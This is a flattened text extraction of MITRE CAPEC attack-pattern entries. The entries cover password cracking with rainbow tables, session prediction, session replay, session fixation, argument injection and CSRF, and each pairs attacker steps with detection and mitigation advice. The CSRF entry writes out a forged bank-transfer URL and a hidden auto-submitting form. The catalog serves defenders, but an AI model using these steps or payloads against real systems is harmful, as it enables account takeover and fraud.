env-Web env-Peer2Peer env-ClientServer env-CommProtocol
Password authentication not used in application/system.
env-All
At least one (unsalted) password hash obtained.
No password hashes obtained by attacker.
Run rainbow table-based password cracking tool
An attacker finds or writes a password cracking tool that uses a previously computed rainbow table for the right hashing algorithm. It helps if the attacker knows what hashing algorithm was used by the password system.
Run rainbow table-based password cracking tool such as Ophcrack or RainbowCrack. Reduction function must depend on application's/system's password policy.
env-All
Success outcome in step 2.
env-All
Failure outcome in step 2.
env-All
A password corresponding to the hash recovered.
Password corresponding to the hash could not be recovered with the given rainbow table.
Include salts in hashes.
Hash of the original password is available to the attacker. For a better chance of success, an attacker should have more than one hash of the original password, and ideally the whole table.
Salt was not used to create the hash of the original password. Otherwise the rainbow tables have to be re-computed, which is very expensive and will make the attack effectively infeasible (especially if salt was added in iterations).
The system uses one factor password based authentication.
Medium
Medium
Brute Force
BusyBox 1.1.1 does not use a salt when generating passwords, which makes it easier for local users to guess passwords from a stolen password file using techniques such as rainbow tables.
CVE-2006-1058
Low
A variety of password cracking tools are available that can leverage a rainbow table. The more difficult part is to obtain the password hash(es) in the first place.
Rainbow table of password hash chains with the right algorithm used. A password cracking tool that leverages this rainbow table will also be required. Hash(es) of the password is required.
This is a completely offline attack that an attacker can perform at their leisure after the password hashes are obtained.
Use salt when computing password hashes. That is, concatenate the salt (random bits) with the original password prior to hashing it.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
261
Targeted
521
Targeted
262
Secondary
263
Secondary
693
Targeted
719
Secondary
1000
Attack Pattern
ChildOf
49
Penetration
High
High
Low
All
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attackers can, in some cases, get around logic put in place to 'guard' sensitive functionality or data.
The attack may involve gaining access to and calling protected functionality (or accessing protected data) directly, may involve subverting some aspect of the guard's implementation, or outright removal of the guard, if possible.
The attacker determines, through brute-forcing, reverse-engineering or other similar means, the location and logic of the guard element
The attacker then tries to determine the mechanism to circumvent the guard.
Once the mechanism has been determined, the attacker proceeds to access the protected functionality
The Attacker must have reverse-engineered the application and its design extensively enough to have determined that a guard element exists. This may have been done as simply as through probing (and likely receiving too verbose an error message) or could have involved high-brow techniques supported by advanced reverse engineering/debugging tools.
Very High
Medium
Attacker uses click-through exploration of a Servlet-based website to map out its functionality, taking note of its URL-naming conventions and Servlet mappings. Using this knowledge and guessing the Servlet name of functionality they're not authorized to use, the Attacker directly navigates to the privileged functionality around the authorizing single-front controller (implementing programmatic authorization checks).
Attacker reverse-engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary.
Medium
The attacker must ability to understand complex design logic as well as possibly the ability to reverse-engineer the design and code to determine placement and logic of guard element.
The attacker needs the ability to explore the application's functionality and response to various conditions.
In cases where the guard component sits server-side, the attacker will likely require a valid login.
In the case that guard functionality exists client-side, the attacker will likely require reverse-engineering tools, such as a disassembler.
Attackers may confine (and succeed with) probing as simple as exploring an application's functionality and its underlying mapping to server-side components. It is likely that for this to succeed, the Attacker will need a valid login.
At the other extreme, Attackers capable of reverse engineering client code will have the ability to remove functionality or identify the whereabouts of sensitive data through white box analysis, such as review of reverse-engineered code.
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Confidentiality
Read memory
Integrity
Modify memory
288
Targeted
372
Secondary
510
Targeted
693
Targeted
721
Targeted
CVE-2007-0968
Unspecified vulnerability in Cisco Firewall Services Module (FWSM) before 2.3(4.7) and 3.x before 3.1(3.1) causes the access control entries (ACE) in an ACL to be improperly evaluated, which allows remote authenticated users to bypass intended certain ACL protections.
CVE-2007-0802
Mozilla Firefox 2.0.0.1 allows remote attackers to bypass the Phishing Protection mechanism by adding certain characters to the end of the domain name, as demonstrated by the "." and "/" characters, which is not caught by the Phishing List blacklist filter.
VU#258834
WebEOC ties privileges and roles to client-side resources. If an attacker can access a resource directly, that attacker will be granted all the privileges associated with that resource.
1000
Attack Pattern
ChildOf
207
Defense in Depth
Complete Mediation
Failing Securely
Use Authentication Mechanisms, Where Appropriate, Correctly
Use Authorization Mechanisms Correctly
Penetration
High
High
Low
All
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to place man in the middle once SSL is terminated. Rest applications premise is that they leverage existing infrastructure to deliver web services functionality. An example of this is a Rest application that uses HTTP Get methods and receives a HTTP response with an XML document. These Rest style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required. Unfortunately from a security standpoint, there frequently is no interoperable identity security mechanism deployed, so Rest developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network - at the firewall, load balancer, or router. Once the SSL is terminated the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The attacker can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password that are passed in the clear once SSL is terminated.
Once the attacker gathers these credentials, they can submit requests to the web service provider just as authorized user do. There is not typically an authentication on the client side, beyond what is passed in the request itself so once this is compromised, then this is generally sufficient to compromise the service's authentication scheme.
Opportunity to intercept must exist beyond the point where SSL is terminated.
The attacker must be able to insert a listener actively (proxying the communication) or passively (sniffing the communication) in the client-server communication path.
Very High
Medium
Protocol Manipulation
Injection
The Rest service provider uses SSL to protect the communications between the service requester (client) to the service provider. In the instance where SSL is terminated before the communications reach the web server, it is very common in enterprise data centers to terminate SSL at a router, firewall, load balancer, proxy or other device, then the attacker can insert a sniffer into the communication stream and gather all the authentication tokens (such as session credentials, username/passwords combinations, and so on). The Rest service requester and service provider do not have any way to detect this attack.
Low
To insert a network sniffer or other listener into the communication stream
Attacker may use a network sniffer to identify authentication credentials once SSL is terminated.
Implementation: Implement message level security such as HMAC in the HTTP communication
Design: Utilize defense in depth, do not rely on a single security mechanism like SSL
Design: Enforce principle of least privilege
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
HTTP protocol communications
Command(s) executed directly on host
Client machine and client network
Enables attacker to execute server side code with any commands that the program owner has privileges to.
300
Targeted
287
Targeted
724
Targeted
693
Targeted
1000
Attack Pattern
ChildOf
94
Penetration
Exploitation
High
High
High
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side.
The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.
The attacker needs to be able to identify HTTP Get URLs. The Get methods must be set to call applications that perform operations other than get such as update and delete.
High
High
Injection
The HTTP Get method is designed to retrieve resources and not to alter the state of the application or resources on the server side. However, developers can easily code programs that accept a HTTP Get request that do in fact create, update or delete data on the server. Both Flickr (http://www.flickr.com/services/api/flickr.photosets.delete.html) and del.icio.us (http://del.icio.us/api/posts/delete) have implemented delete operations using standard HTTP Get requests. These HTTP Get methods do delete data on the server side, despite being called from Get which is not supposed to alter state.
Low
It is relatively straightforward to identify an HTTP Get method that changes state on the server side and executes against an over-privileged system interface
Attacker may enumerate URLs to identify vulnerable services.
Design: Enforce principle of least privilege
Implementation: Ensure that HTTP Get methods only retrieve state and do not alter state on the server side
Implementation: Ensure that HTTP methods have proper ACLs based on what the functionality they expose
Integrity
Modify application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Payload delivered through standard communication protocols. In the Flickr and del.icio.us examples above, this is done through a normal web browser
Command(s) executed directly on host
Client machine and client network
Enables attacker to execute server side code with any commands that the program owner has privileges to.
267
Targeted
269
Targeted
264
Targeted
1000
Attack Pattern
ChildOf
1
1000
Category
ChildOf
233
Penetration
Exploitation
High
High
Low
SOA
All
All
All
Mark O'Neill
Security for REST Web Services
Vprde;
http://www.vordel.com/downloads/rsa_conf_2006.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
Find Session IDs
The attacker interacts with the target host and finds that session IDs are used to authenticate users.
An attacker makes many anonymous connections and records the session IDs assigned.
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
An attacker makes authorized connections and records the session tokens or credentials issued.
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
Web applications use session IDs
env-Web
Network systems issue session IDs or connection IDs
env-CommProtocol env-ClientServer env-Peer2Peer
Monitor logs for unusual amounts of invalid sessions.
Monitor logs for unusual amounts of invalid connections or invalid requests from unauthorized hosts.
Characterize IDs
The attacker studies the characteristics of the session ID (size, format, etc.). As a results the attacker finds that legitimate session IDs are predictable.
Cryptanalysis. The attacker uses cryptanalysis to determine if the session IDs contain any cryptographic protections.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Pattern tests. The attacker looks for patterns (odd/even, repetition, multiples, or other arithmetic relationships) between IDs
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Comparison against time. The attacker plots or compares the issued IDs to the time they were issued to check for correlation.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Patterns are detectable in session IDs
Session IDs pass NIST FIPS 140 statistical tests for cryptographic randomness.
Session IDs are repeated.
Match issued IDs
The attacker brute forces different values of session ID and manages to predict a valid session ID.
The attacker models the session ID algorithm enough to produce a compatible session IDs, or just one match.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Session identifiers successfully spoofed
No session IDs can be found or exploited
Use matched Session ID
The attacker uses the falsified session ID to access the target system.
The attacker loads the session ID into his web browser and browses to restricted data or functionality.
env-Web
The attacker loads the session ID into his network communications and impersonates a legitimate user to gain access to data or functionality.
env-CommProtocol env-Peer2Peer env-ClientServer
Monitor the correlation between session IDs and other station designations (MAC address, IP address, VLAN, etc.). Alert on session ID reuse from multiple sources.
Terminate both sessions if an ID is used from multiple origins.
The target host uses session IDs to keep track of the users.
Session IDs are used to control access to resources.
The session IDs used by the target host are predictable. For example, the session IDs are generated using predictable information (e.g., time).
High
High
Spoofing
Brute Force
Analysis
Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks.
CVE-2006-6969
mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
CVE-2001-1534
Low
There are tools to brute force session ID. Those tools require a low level of knowledge.
Medium
Predicting Session ID may require more computation work which uses advanced analysis such as statistical analysis.
The attacker can perform analysis of the randomness of the session generation algorithm.
The attacker may need to steal a few valid session IDs using a different type of attack. And then use those session ID to predict the following ones.
The attacker can use brute force tools to find a valid session ID.
Use a strong source of randomness to generate a session ID.
Use adequate length session IDs
Do not use information available to the user in order to generate session ID (e.g., time).
Ideas for creating random numbers are offered by Eastlake [RFC1750]
Encrypt the session ID if you expose it to the user. For instance session ID can be stored in a cookie in encrypted format.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
290
Targeted
330
Targeted
331
Targeted
346
Targeted
488
Secondary
539
Secondary
200
Secondary
6
Targeted
285
Secondary
384
Secondary
693
Targeted
719
Secondary
1000
Attack Pattern
ChildOf
196
333
Category
HasMember
351
Securing the Weakest Link
Penetration
High
High
Low
Client-Server
J2EE
.NET
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.
Discovery of potential injection vectors
Using an automated tool or manual discovery, the attacker identifies services or methods with arguments that could potentially be used as injection vectors (OS, API, SQL procedures, etc.).
Manually cover the application and record the possible places where arguments could be passed into external systems.
env-All
Use a spider, for web applications, to create a list of URLs and associated inputs.
env-All
Arguments are used by the application in exposed services or methods
env-All
No parameters appear to be used.
env-All
Application does not use any inputs.
env-All
A list of parameters, arguments to modify is identified.
A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
1. Attempt variations on argument content
Possibly using an automated tool, the attacker will perform injection variations of the arguments.
Use a very large list of probe strings in order to detect if there is a positive result, and, what type of system has been targeted (if obscure).
env-All
Use a proxy tool to record results, error messages and/or log if accessible.
env-All
The application behaves like the injection has been a success.
env-All
No result appears.
env-All
It is possible to monitor the application and to see that the argument has been validated.
Actively monitor malicious inputs.
Monitor the services and/or methods uses of the arguments.
Abuse of the application
The attacker injects specific syntax into a particular argument in order to generate a specific malicious effect in the targeted application.
Manually inject specific payload into targeted argument.
env-All
The attacker observes desired effect.
Actively monitor malicious inputs.
Monitor the services and/or methods uses of the arguments.
Target software fails to strip all user-supplied input of any content that could cause the shell to perform unexpected actions.
Software must allow for unvalidated or unfiltered input to be executed on operating system shell, and, optionally, the system configuration must allow for output to be sent back to client.
High
High
Injection
A recent example instance of argument injection occurred against Java Web Start technology, which eases the client side deployment for Java programs. The JNLP files that are used to describe the properties for the program. The client side Java runtime used the arguments in the property setting to define execution parameters, but if the attacker appends commands to an otherwise legitimate property file, then these commands are sent to the client command shell. [R.6.2]
Medium
The attacker has to identify injection vector, identify the operating system-specific commands, and optionally collect the output.
Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP.
Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.
Design: Limit program privileges, so if metacharacters or other methods circumvent program input validation routines and shell access is attained then it is not running under a privileged account. chroot jails create a sandbox for the application to execute in, making it more difficult for an attacker to elevate privilege even in the case that a compromise has occurred.
Implementation: Implement an audit log that is written to a separate host, in the event of a compromise the audit log may be able to provide evidence and details of the compromise.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Integrity
Modify application data
Confidentiality
Read application data
Malicious input delivered through standard input, the attacker inserts additional arguments on the application's standard interface
Varies with instantiation of attack pattern. Malicious payload either pass commands through valid parameters or supply metacharacters that cause unexpected termination that redirects to shell
Client machine and client network (e.g. Intranet)
Enables attacker to execute server side code with any commands that the program owner has privileges to, this is particularly problematic when the program is run as a system or privileged account.
77
Targeted
146
Targeted
184
Targeted
78
Targeted
185
Targeted
713
Targeted
697
Targeted
1000
Attack Pattern
ChildOf
137
Never Use Input as Part of a Directive to any Internal Component
Penetration
Low
High
Low
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Jouko Pynnonen
Java Web Start argument injection vulnerability
http://www.securityfocus.com/archive/1/393696
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.
The attacker interacts with the target host and finds that session IDs are used to authenticate users.
The attacker steals a session ID from a valid user.
The attacker tries to use the stolen session ID to gain access to the system with the privileges of the session ID's original owner.
The target host uses session IDs to keep track of the users.
Session IDs are used to control access to resources.
The session IDs used by the target host are not well protected from session theft.
High
High
Spoofing
Social Engineering
Analysis
OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls.
CVE-1999-0428
Merak Mail IceWarp Web Mail uses a static identifier as a user session ID that does not change across sessions, which could allow remote attackers with access to the ID to gain privileges as that user, e.g. by extracting the ID from the user's answer or forward URLs.
CVE-2002-0258
Low
If an attacker can steal a valid session ID, he can then try to be authenticated with that stolen session ID.
Medium
More sophisticated attack can be used to hijack a valid session from a user and spoof a legitimate user by reusing his valid session ID.
The attacker can listen to a conversation between the client and server and steal a valid session ID.
The attacker can try to steal session information from the user's cookies.
The attacker can try a valid session from a finished transaction and find out that the transaction associated with the session ID did not time out.
Always invalidate a session ID after the user logout.
Setup a session time out for the session IDs.
Protect the communication between the client and server. For instance it is best practice to use SSL to mitigate man in the middle attack.
Do not code send session ID with GET method, otherwise the session ID will be copied to the URL. In general avoid writing session IDs in the URLs. URLs can get logged in log files, which are vulnerable to an attacker.
Encrypt the session data associated with the session ID.
Use multifactor authentication.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
294
Targeted
290
Targeted
346
Targeted
384
Targeted
488
Secondary
539
Secondary
200
Secondary
285
Secondary
664
Targeted
732
Targeted
1000
Attack Pattern
ChildOf
21
Securing the Weakest Link
Penetration
High
High
Low
Client-Server
J2EE
.NET
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
The attacker induces a client to establish a session with the target software using a session identifier provided by the attacker. Once the user successfully authenticates to the target software, the attacker uses the (now privileged) session identifier in their own transactions. This attack leverages the fact that the target software either relies on client-generated session identifiers or maintains the same session identifiers after privilege elevation.
Setup the Attack
Setup a session: The attacker has to setup a trap session that provides a valid session identifier, or select an arbitrary identifier, depending on the mechanism employed by the application. A trap session is a dummy session established with the application by the attacker and is used solely for the purpose of obtaining valid session identifiers. The attacker may also be required to periodically refresh the trap session in order to obtain valid session identifiers.
The attacker chooses a predefined identifier that he knows.
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
The attacker creates a trap session for the victim.
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
The application accepts predefined, or user-provided session IDs
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
The application ignores predefined, or user-provided session IDs and provides new session IDs.
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
A trap session or a predefined session ID is established.
Detect and alert on users who provide unknown session IDs in their connection establishment. Since this also fits the scenario where a user's session has expired, the heuristic must be a bit smarter, perhaps looking for an unusually high number of such occurrences in a short time frame.
Detect and alert on multiple origins connecting with the same predefined session ID.
Attract a Victim
Fixate the session: The attacker now needs to transfer the session identifier from the trap session to the victim by introducing the session identifier into the victim's browser. This is known as fixating the session. The session identifier can be introduced into the victim's browser by leveraging cross site scripting vulnerability, using META tags or setting HTTP response headers in a variety of ways.
Attackers can put links on web sites (such as forums, blogs, or comment forms).
env-Web
Attackers can establish rogue proxy servers for network protocols that give out the session ID and then redirect the connection to the legitimate service.
env-Peer2Peer env-ClientServer env-CommProtocol
Attackers can email attack URLs to potential victims through spam and phishing techniques.
env-Web
A victim makes a connection according to the attackers' design.
Record referrers from web clients that connect with predefined session IDs. Alert when referrers do not match known, acceptable sites.
Abuse the Victim's Session
Takeover the fixated session: Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the fixated session identifier.
The attacker loads the predefined session ID into his browser and browses to protected data or functionality.
env-Web
The attacker loads the predefined session ID into his software and utilizes functionality with the rights of the victim.
env-CommProtocol env-ClientServer env-Peer2Peer
The attacker gains access to data or functionality with the rights of the victim.
Detect and alert on multiple simultaneous uses of the same session ID from different origins.
Disconnect all simultaneous users of the same session ID when they arrive from different origins.
Session identifiers that remain unchanged when the privilege levels change.
Permissive session management mechanism that accepts random user-generated session identifiers
Predictable session identifiers
High
Medium
Time and State
Injection
Consider a banking application that issues a session identifier in the URL to a user before login, and uses the same identifier to identify the customer following successful authentication. An attacker can easily leverage session fixation to access a victim's account by having the victim click on a forged link that contains a valid session identifier from a trapped session setup by the attacker. Once the victim is authenticated, the attacker can take over the session and continue with the same levels of privilege as the victim.
An attacker can hijack user sessions, bypass authentication controls and possibly gain administrative privilege by fixating the session of a user authenticating to the Management Console on certain versions of Macromedia JRun 4.0. This can be achieved by setting the session identifier in the user's browser and having the user authenticate to the Management Console. Session fixation is possible since the application server does not regenerate session identifiers when there is a change in the privilege levels.
CVE-2004-2182
Low
Only basic skills are required to determine and fixate session identifiers in a user's browser. Subsequent attacks may require greater skill levels depending on the attackers' motives.
None
Determining whether the target application server accepts preset session identifiers is relatively easy. The attacker may try setting session identifiers in the URL or hidden form fields or in cookies, depending upon application design. Having access to an account or by utilizing a dummy account, the attacker can determine whether the preset session identifiers are accepted or not.
With code or design in hand, the attacker can readily verify whether preset session identifiers are accepted and whether identifiers are regenerated, and possible destroyed, when privilege levels change.
There are no indicators for the server since a fixated session identifier is similar to an ordinarily generated one. However, too many invalid sessions due to invalid session identifiers is a potential warning.
A client can be suspicious if a received link contains preset session identifiers. However, this depends on the client's knowledge of such an issue. Also, fixation through Cross Site Scripting or hidden form fields is usually difficult to detect.
Use a strict session management mechanism that only accepts locally generated session identifiers: This prevents attackers from fixating session identifiers of their own choice.
Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.
Use session identifiers that are difficult to guess or brute-force: One way for the attackers to obtain valid session identifiers is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
GET or POST data, Hidden form fields and session cookies
Preset session identifier
Target application's session management mechanism
The payload activation impact is that a session identifier of the attackers' choice is considered valid and trust decisions by the application will be based on such a fixated identifier.
384
Targeted
361
Secondary
664
Targeted
732
Targeted
1000
Attack Pattern
ChildOf
21
333
Category
HasMember
370
Regenerate session identifiers upon each new request. This ensures that fixated session identifiers are rendered obsolete.
Regenerate a session identifier every time a user enters an authenticated session and destroy the identifier when the user logs out of an authenticated session.
Set appropriate expiry times on cookies that contain session identifiers. This helps limit the window of opportunity for an attacker to use the identifier.
Do not use session identifiers as part of URLs or hidden form fields. It becomes easy for an attacker to trick a user into a fixated session when session identifiers are easily accessible.
Authenticate every transaction by requesting credentials. This ensures that only a legitimate user of the application can proceed with the transaction. If an attacker seeks to perform any such authenticated transaction, valid credentials will be required even though session fixation may have been successful earlier.
Complete Mediation
Reluctance to Trust
Defense in Depth
Never Use Unvalidated Input as Part of a Directive to any Internal Component
Penetration
High
High
Low
Client-Server
J2EE
.NET
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-384 - Session Fixation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/384.html
Common Weakness Enumeration (CWE)
CWE-361 - Time and State
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/361.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level.
This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply "riding" the existing session cookie.
Explore target website
The attacker first explores the target website to determine pieces of functionality that are of interest to him (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.
Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server
env-Web
Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server
env-Web
View HTML source of web pages that contain links or buttons that perform actions of interest.
env-Web
Attacker identifies at least one piece of interesting functionality that can be executed by making a single HTTP GET or POST request containing no session-specific parameters.
Attacker cannot identify any functionality that can be executed without sending a session-specific parameter other than the cookie in the HTTP request.
Create a link that when clicked on, will execute the interesting functionality.
The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.
Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)
env-Web
Create a form that will submit a POST request (e.g. <form method="POST" action="https://www.somebank.com/members/transfer.asp"><input type="hidden" Name="to" value="012345678901"/><input type="hidden" Name="amt" value="10000"/><input type="submit" src="clickhere.jpg"/></form>
env-Web
Success outcome in previous step.
env-Web
Failure outcome in previous step.
env-Web
A link that performs an operation that the attacker desires when it is clicked.
Creating a link that performs an operation that the attacker desires when it is clicked, is impossible, because the site has implemented protections against CSRF.
Include a unique HTTP parameter value in forms every time they are sent to the client. Verify that the expected value is in the response received from the client. In this case, the attacker will not have access to the correct parameter value for another user, and thus, will not be able to create forged requests.
Check HTTP referrer for each request to ensure that it is from the expected site. Note that if the site is vulnerable to XSS, then the attacker will be able to bypass this.
Convince user to click on link
Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.
Execute a phishing attack and send the user an e-mail convincing him to click on a link.
env-Web
Execute a stored XSS attack on a website to permanently embed the malicious link into the website.
env-Web
Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.
env-Web
Include the malicious link on the attackers' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site.
env-Web
Success outcome in previous step.
env-Web
Failure outcome in previous step.
env-Web
A user executes the malicious link crafted by the attacker.
Failure outcome in previous step.
Monitor server logs for referrers. If users are being tricked into clicking CSRF links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Deny requests and invalidate session IDs for requests that contain unexpected referrers. Note that this will not protect against cases where the target website is also vulnerable to cross site scripting.
Very High
High
Spoofing
Analysis
While a user is logged into his bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.
The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.
The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.
Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail.
Medium
The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes.
All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim.
The attacker can observe the way the application accepts requests for actions. If the application uses a persistent cookie, a non-random identifier or any such static identification token that does not change with every request, the attack is fairly straightforward to accomplish
In order to obfuscate the actual URL and its contents passed to the victim, the attacker can employ a service such as TinyURL and optionally redirect the request to the actual malicious script
Use cryptographic tokens to associate a request with a specific action. The token can be regenerated at every request so that if a request with an invalid token is encountered, it can be reliably discarded. The token is considered invalid if it arrived with a request other than the action it was supposed to be associated with.
Although less reliable, the use of the optional HTTP Referrer header can also be used to determine whether an incoming request was actually one that the user is authorized for, in the current context.
Additionally, the user can also be prompted to confirm an action every time an action concerning potentially sensitive data is invoked. This way, even if the attacker manages to get the user to click on a malicious link and request the desired action, the user has a chance to recover by denying confirmation. This solution is also implicitly tied to using a second factor of authentication before performing such actions.
In general, every request must be checked for the appropriate authentication token as well as authorization in the current session context.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Read application data
Integrity
Modify application data
352
Targeted
306
Secondary
664
Targeted
732
Targeted
716
Targeted
1000
Attack Pattern
ChildOf
21
333
Category
HasMember
342
Complete Mediation
Defense In Depth
Use Authorization Mechanisms Correctly
Use Authentication Mechanisms, Where Appropriate, Correctly
Exploitation
High
High
Low
Client-Server
J2EE
.NET
All
All
Thomas Schreiber
Session Riding: A Widespread Vulnerability in Today's Web Applications
SecureNet GmbH
Dec 2004
http://www.securenet.de/papers/Session_Riding.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker embeds malicious scripts in content that will be served to web browsers. The goal of the attack is for the target software, the client-side browser, to execute the script with the users' privilege level.
An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts. Web browsers, for example, have some simple security controls in place, but if a remote attacker is allowed to execute scripts (through injecting them in to user-generated content like bulletin boards) then these controls may be bypassed. Further, these attacks are very difficult for an end user to detect.
Survey the application for user-controllable inputs
Using a browser or an automated tool, an attacker follows all public links and actions on a web site. He records all the links, the forms, the resources accessed and all other potential entry-points for the web application.
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
env-Web
Use a proxy tool to record all links visited during a manual traversal of the web application.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
env-Web
Inputs are used by the application or the browser (DOM)
env-Web
Using URL rewriting, parameters may be part of the URL path.
env-Web
No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker.
A list of application user interface entry fields is created by the attacker.
A list of resources accessed by the application is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
